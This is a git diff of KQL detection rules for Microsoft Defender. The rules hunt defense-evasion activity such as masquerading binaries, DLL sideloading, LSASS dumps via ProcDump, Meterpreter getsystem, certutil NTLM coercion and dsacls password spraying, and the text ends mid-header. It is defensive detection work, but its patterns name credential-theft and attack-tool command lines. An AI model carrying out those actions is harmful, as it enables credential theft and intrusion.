"WindowsApps" subfolder of "C:\Program Files". -// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036 - -DeviceProcessEvents +// Title: Potential Fake Instance Of Hxtsr.EXE Executed +// Author: Sreeman +// Date: 2020-04-17 +// Level: medium +// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. +// HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files". +// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents | where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql index 4f108098..64e50595 100644 --- a/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql +++ b/KQL/rules/Defense Evasion/potential_file_download_via_ms_appinstaller_protocol_handler.kql @@ -1,11 +1,11 @@ -// Title: Potential File Download Via MS-AppInstaller Protocol Handler -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel -// Date: 2023-11-09 -// Level: medium -// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE -// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Potential File Download Via MS-AppInstaller Protocol Handler +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel +// Date: 2023-11-09 +// Level: medium +// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE +// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql index 8b44ac72..088e87ae 100644 --- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql +++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream.kql @@ -1,12 +1,12 @@ -// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream -// Author: Scoubi (@ScoubiMtl) -// Date: 2023-10-09 -// Level: medium -// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream +// Author: Scoubi (@ScoubiMtl) +// Date: 2023-10-09 +// Level: medium +// Description: Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Unlikely + +DeviceFileEvents | where FolderPath contains "::$index_allocation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql index 0208baee..52c4e4bb 100644 --- a/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql +++ b/KQL/rules/Defense Evasion/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql @@ -1,12 +1,12 @@ -// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI -// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl) -// Date: 2023-10-09 -// Level: medium -// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI +// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl) +// Date: 2023-10-09 +// Level: medium +// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ProcessCommandLine contains "::$index_allocation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql index 09b123c5..4f75e317 100644 --- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql +++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters.kql @@ -1,14 +1,14 @@ -// Title: Potential Homoglyph Attack Using Lookalike Characters -// Author: Micah Babinski, @micahbabinski -// Date: 2023-05-07 -// Level: medium -// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. -// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that -// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 -// False Positives: -// - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. - -DeviceProcessEvents +// Title: Potential Homoglyph Attack Using Lookalike Characters +// Author: Micah Babinski, @micahbabinski +// Date: 2023-05-07 +// Level: medium +// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. +// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that +// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 +// False Positives: +// - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use. + +DeviceProcessEvents | where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql index a0864334..eda4034a 100644 --- a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql +++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql @@ -1,14 +1,14 @@ -// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename -// Author: Micah Babinski, @micahbabinski -// Date: 2023-05-08 -// Level: medium -// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. -// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that -// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 -// False Positives: -// - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use. - -DeviceFileEvents +// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename +// Author: Micah Babinski, @micahbabinski +// Date: 2023-05-08 +// Level: medium +// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. +// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that +// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 +// False Positives: +// - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use. + +DeviceFileEvents | where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql index 9b94e252..0a5e2204 100644 --- a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql +++ b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql @@ -1,10 +1,10 @@ -// Title: Potential LethalHTA Technique Execution -// Author: Markus Neis -// Date: 2018-06-07 -// Level: high -// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.005 - -DeviceProcessEvents +// Title: Potential LethalHTA Technique Execution +// Author: Markus Neis +// Date: 2018-06-07 +// Level: high +// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.005 + +DeviceProcessEvents | where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql index 33f0631e..4ba1d45e 100644 --- a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql +++ b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql @@ -1,12 +1,12 @@ -// Title: Potential Libvlc.DLL Sideloading -// Author: X__Junior -// Date: 2023-04-17 -// Level: medium -// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 -// False Positives: -// - False positives are expected if VLC is installed in non-default locations - -DeviceImageLoadEvents +// Title: Potential Libvlc.DLL Sideloading +// Author: X__Junior +// Date: 2023-04-17 +// Level: medium +// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected if VLC is installed in non-default locations + +DeviceImageLoadEvents | where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql index f8ad213b..a5aa6c57 100644 --- a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql +++ b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql @@ -1,16 +1,16 @@ -// Title: Potential LSASS Process Dump Via Procdump -// Author: Florian Roth (Nextron Systems) -// Date: 2018-10-30 -// Level: high -// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump. -// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers. -// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory. -// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009 -// False Positives: -// - Unlikely, because no one should dump an lsass process memory -// - Another tool that uses command line flags similar to ProcDump - -DeviceProcessEvents +// Title: Potential LSASS Process Dump Via Procdump +// Author: Florian Roth (Nextron Systems) +// Date: 2018-10-30 +// Level: high +// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump. +// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers. +// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory. +// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009 +// False Positives: +// - Unlikely, because no one should dump an lsass process memory +// - Another tool that uses command line flags similar to ProcDump + +DeviceProcessEvents | where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mm " or ProcessCommandLine contains " /mm " or ProcessCommandLine contains " –mm " or ProcessCommandLine contains " —mm " or ProcessCommandLine contains " ―mm " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " ls" or ProcessCommandLine contains " keyiso" or ProcessCommandLine contains " samss") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql index 4cdaeef5..178f8a80 100644 --- a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql +++ b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql @@ -1,12 +1,12 @@ -// Title: Potential Manage-bde.wsf Abuse To Proxy Execution -// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-13 -// Level: high -// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Potential Manage-bde.wsf Abuse To Proxy Execution +// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-13 +// Level: high +// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql index b71d8e71..9efe4f59 100644 --- a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql +++ b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql @@ -1,12 +1,12 @@ -// Title: Potential Memory Dumping Activity Via LiveKD -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: medium -// Description: Detects execution of LiveKD based on PE metadata or image name -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Administration and debugging activity (must be investigated) - -DeviceProcessEvents +// Title: Potential Memory Dumping Activity Via LiveKD +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: medium +// Description: Detects execution of LiveKD based on PE metadata or image name +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Administration and debugging activity (must be investigated) + +DeviceProcessEvents | where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql index 178c730c..f77d2325 100644 --- a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql +++ b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql @@ -1,13 +1,13 @@ -// Title: Potential Meterpreter/CobaltStrike Activity -// Author: Teymur Kheirkhabarov, Ecco, Florian Roth -// Date: 2019-10-26 -// Level: high -// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002 -// False Positives: -// - Commandlines containing components like cmd accidentally -// - Jobs and services started with cmd - -DeviceProcessEvents +// Title: Potential Meterpreter/CobaltStrike Activity +// Author: Teymur Kheirkhabarov, Ecco, Florian Roth +// Date: 2019-10-26 +// Level: high +// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002 +// False Positives: +// - Commandlines containing components like cmd accidentally +// - Jobs and services started with cmd + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\services.exe" and (((ProcessCommandLine contains "cmd" or ProcessCommandLine contains "%COMSPEC%") and (ProcessCommandLine contains "/c" and ProcessCommandLine contains "echo" and ProcessCommandLine contains "\\pipe\\")) or (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".dll,a" and ProcessCommandLine contains "/p:")) and (not(ProcessCommandLine contains "MpCmdRun")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql index a7f8629d..bc7060f8 100644 --- a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql +++ b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql @@ -1,12 +1,12 @@ -// Title: Potential Mftrace.EXE Abuse -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-09 -// Level: medium -// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 -// False Positives: -// - Legitimate use for tracing purposes - -DeviceProcessEvents +// Title: Potential Mftrace.EXE Abuse +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-09 +// Level: medium +// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use for tracing purposes + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\mftrace.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql index 97112aef..4528084c 100644 --- a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql +++ b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql @@ -1,10 +1,10 @@ -// Title: Potential MsiExec Masquerading -// Author: Florian Roth (Nextron Systems) -// Date: 2019-11-14 -// Level: high -// Description: Detects the execution of msiexec.exe from an uncommon directory -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005 - -DeviceProcessEvents +// Title: Potential MsiExec Masquerading +// Author: Florian Roth (Nextron Systems) +// Date: 2019-11-14 +// Level: high +// Description: Detects the execution of msiexec.exe from an uncommon directory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 + +DeviceProcessEvents | where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql index 07571635..75328785 100644 --- a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql @@ -1,10 +1,10 @@ -// Title: Potential NTLM Coercion Via Certutil.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-01 -// Level: high -// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Potential NTLM Coercion Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql index 5029f77d..468f6209 100644 --- a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql +++ b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql @@ -1,10 +1,10 @@ -// Title: Potential Obfuscated Ordinal Call Via Rundll32 -// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2023-05-17 -// Level: medium -// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.010 - -DeviceProcessEvents +// Title: Potential Obfuscated Ordinal Call Via Rundll32 +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-05-17 +// Level: medium +// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents | where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-" or ProcessCommandLine contains "#0" or ProcessCommandLine contains "#655" or ProcessCommandLine contains "#656") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql index 2f8dca1e..25d2e033 100644 --- a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql +++ b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql @@ -1,12 +1,12 @@ -// Title: Potential Password Spraying Attempt Using Dsacls.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-20 -// Level: medium -// Description: Detects possible password spraying attempts using Dsacls -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate use of dsacls to bind to an LDAP session - -DeviceProcessEvents +// Title: Potential Password Spraying Attempt Using Dsacls.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects possible password spraying attempts using Dsacls +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use of dsacls to bind to an LDAP session + +DeviceProcessEvents | where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql index 8881b362..4566be91 100644 --- a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql +++ b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql @@ -1,12 +1,12 @@ -// Title: Potential PendingFileRenameOperations Tampering -// Author: frack113 -// Date: 2023-01-27 -// Level: medium -// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.003 -// False Positives: -// - Installers and updaters may set currently in use files for rename or deletion after a reboot. - -DeviceRegistryEvents +// Title: Potential PendingFileRenameOperations Tampering +// Author: frack113 +// Date: 2023-01-27 +// Level: medium +// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Installers and updaters may set currently in use files for rename or deletion after a reboot. + +DeviceRegistryEvents | where RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations" and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or InitiatingProcessFolderPath contains "\\Users\\Public\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql index 440754e0..c3b4845d 100644 --- a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql +++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql @@ -1,11 +1,11 @@ -// Title: Potential Persistence Via Outlook Home Page -// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand -// Date: 2021-06-09 -// Level: high -// Description: Detects potential persistence activity via outlook home page. -// An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. -// MITRE Tactic: Defense Evasion -// Tags: 